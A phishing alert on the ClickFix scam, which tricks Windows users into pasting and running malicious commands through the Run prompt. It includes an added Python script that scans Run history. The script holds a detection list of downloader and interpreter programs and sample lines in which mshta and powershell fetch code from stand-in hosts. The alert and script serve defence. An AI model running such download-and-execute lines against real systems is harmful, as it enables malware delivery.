
Phishing Alert - Surge in Phishing Attacks Utilizing ClickFix Tactics

Release Date: 17 Mar 2025

Type: Phishing

Phishing Alert

Current Status and Related Trends

Recent threat intelligence indicates a significant rise in phishing attacks employing a new tactic known as "ClickFix." The "ClickFix" scam mimics the "Verify You are a Human" tests that websites commonly use to differentiate real users from bots. Users are asked to pass the test by pressing specific keyboard keys. This action triggers the download of malware on Microsoft Windows. 

 

The steps of the ClickFix deception are detailed below:

 

Step 1 - requires the user to press the keyboard key with the Windows icon and the letter “R” simultaneously, which opens a Windows “Run” prompt capable of executing any program already installed on the system.

 

Step 2 - instructs the user to press the “CTRL” key and the letter “V” at the same time, thereby pasting malicious code from the site’s virtual clipboard.

 

Step 3 - involves pressing the “Enter” key, prompting Windows to download and execute malicious code.
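
Because Step 1 goes through the Windows "Run" prompt, whatever is pasted in Step 2 is recorded in the current user's Run history (the `RunMRU` registry key), which responders can review after a suspected incident. The following is an added example, not part of the original alert: it flags Run-history entries that start a script-capable program and also reference a remote URL. The program list, function names and sample entries are assumptions constructed for illustration.

```python
import re

# Per-user history of commands typed or pasted into the Run prompt (Win+R).
RUNMRU_KEY = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Assumption: programs able to fetch or execute remote content; tune per environment.
LAUNCHERS = re.compile(
    r"\b(powershell|pwsh|cmd|mshta|curl|certutil|bitsadmin|msiexec|wscript|cscript)(\.exe)?\b",
    re.I)
REMOTE = re.compile(r"https?://", re.I)

def read_runmru():
    """Return the Run-prompt history of the current user (Windows only)."""
    import winreg
    entries = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUNMRU_KEY) as key:
        for i in range(winreg.QueryInfoKey(key)[1]):  # [1] = number of values
            name, data, _ = winreg.EnumValue(key, i)
            if name != "MRUList" and isinstance(data, str):
                entries.append(data)
    return entries

def normalise(entry):
    """RunMRU stores each command with a trailing backslash-1 marker; strip it."""
    return entry[:-2] if entry.endswith("\\1") else entry

def is_suspicious(entry):
    """Flag entries that launch an interpreter or downloader and name a URL."""
    cmd = normalise(entry)
    return bool(LAUNCHERS.search(cmd) and REMOTE.search(cmd))

def triage(entries):
    return [normalise(e) for e in entries if is_suspicious(e)]

# Constructed sample history, used when the registry is not available.
SAMPLE = [
    "notepad\\1",
    "cmd\\1",
    "https://intranet.example.invalid/wiki\\1",
    "mshta https://example.invalid/verify\\1",
    "powershell -c <placeholder-command> https://example.invalid/p.txt\\1",
]

if __name__ == "__main__":
    try:
        history = read_runmru()
    except (ImportError, OSError):  # not Windows, or Run prompt never used
        history = SAMPLE
    for hit in triage(history):
        print("REVIEW:", hit)
```

A hit is a prompt for review rather than proof of compromise, and an empty result does not rule one out, since the history can be cleared.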

 

 

 

The ClickFix tactic has become widespread in recent months, including in attacks targeting hospitality workers, where cybercriminals impersonate Booking.com to deliver credential-stealing malware. These phishing emails often reference negative guest reviews or promotional opportunities, enticing users to engage with malicious content that ultimately leads to malware installation. It has also been observed in attacks targeting Microsoft 365 accounts with a fake Microsoft OAuth webpage.

Recommendations

Organisations and individuals are urged to remain vigilant against these evolving phishing threats and to implement robust security measures to protect sensitive information. Users should always verify the authenticity of emails and links before clicking, especially if the sender's email domain is different from the official domain of the organisation they represent.
